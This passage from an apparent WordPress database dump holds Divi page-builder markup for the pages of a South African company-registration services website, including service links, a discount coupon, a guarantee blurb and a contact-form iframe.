_builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row custom_padding=\"0|0px|12px|0px|false|false\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" custom_padding=\"0px|0px|38px|0px\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','home page for edit','','publish','closed','closed','','home-page-for-edit','','','2019-07-29 10:11:19','2019-07-29 08:11:19','',0,'https://companyregistration.online/et_pb_layout/home-page-for-edit/',0,'et_pb_layout','',0),(31906,3,'2019-07-29 10:12:27','2019-07-29 08:12:27','[et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\" _i=\"1\" _address=\"0.0.0.1\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.27.3\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"3%\" animation_speed_curve=\"ease-in\" _i=\"0\" _address=\"0.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"-26px|223px||427px||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.1.0\"][et_pb_cta title=\"Register A Company\" button_url=\"https://companyregistration.online/company-registrations/\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on|hover\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on|hover\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\" _i=\"0\" _address=\"0.1.0.0\" button_bg_color__hover=\"#0c71c3\" button_bg_enable_color__hover=\"on\" button_text_color__hover=\"#ffffff\"][/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/company-registrations/\" button_text=\"Register A Company\" button_alignment=\"center\" _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"1\" _address=\"0.1.0.1\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.1.1\"][et_pb_cta title=\"Maintain My Company\" button_url=\"https://companyregistration.online/maintaining-your-company/\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.1.0\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/maintaining-your-company/\" button_text=\"Maintain My Company\" button_alignment=\"center\" _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"1\" _address=\"0.1.1.1\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"2\" _address=\"0.1.2\"][et_pb_cta title=\"Register For Tax\" button_url=\"https://companyregistration.online/tax-registrations\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.2.0\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/tax-registrations\" button_text=\"Register For Tax\" button_alignment=\"center\" _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"1\" _address=\"0.1.2.1\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"3\" _address=\"0.1.3\"][et_pb_cta title=\"Combo Deals\" button_url=\"https://companyregistration.online/combo-deals-2\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/combo-deals-2\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.3.0\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/combo-deals-2\" button_text=\"Combo Deals\" button_alignment=\"center\" _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"1\" _address=\"0.1.3.1\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"1.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"Encode Sans Semi Condensed||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Encode Sans Semi Condensed|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.27.3\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"6%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"1.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"1.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\" _i=\"0\" _address=\"2.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\" fb_built=\"1\" _i=\"3\" _address=\"3\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\" _i=\"0\" _address=\"3.0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"3.0.0\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\" _i=\"0\" _address=\"3.0.0.0\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" _i=\"0\" _address=\"3.0.0.0.0\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"1\" _address=\"3.0.0.0.1\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"2\" _address=\"3.0.0.0.2\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"3\" _address=\"3.0.0.0.3\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"4\" _address=\"3.0.0.0.4\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"5\" _address=\"3.0.0.0.5\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','publish','closed','closed','','landing-style-2','','','2019-08-22 16:19:54','2019-08-22 14:19:54','',0,'https://companyregistration.online/?page_id=31906',0,'page','',0),(32388,3,'2019-08-08 10:36:03','2019-08-08 08:36:03','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|48px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" 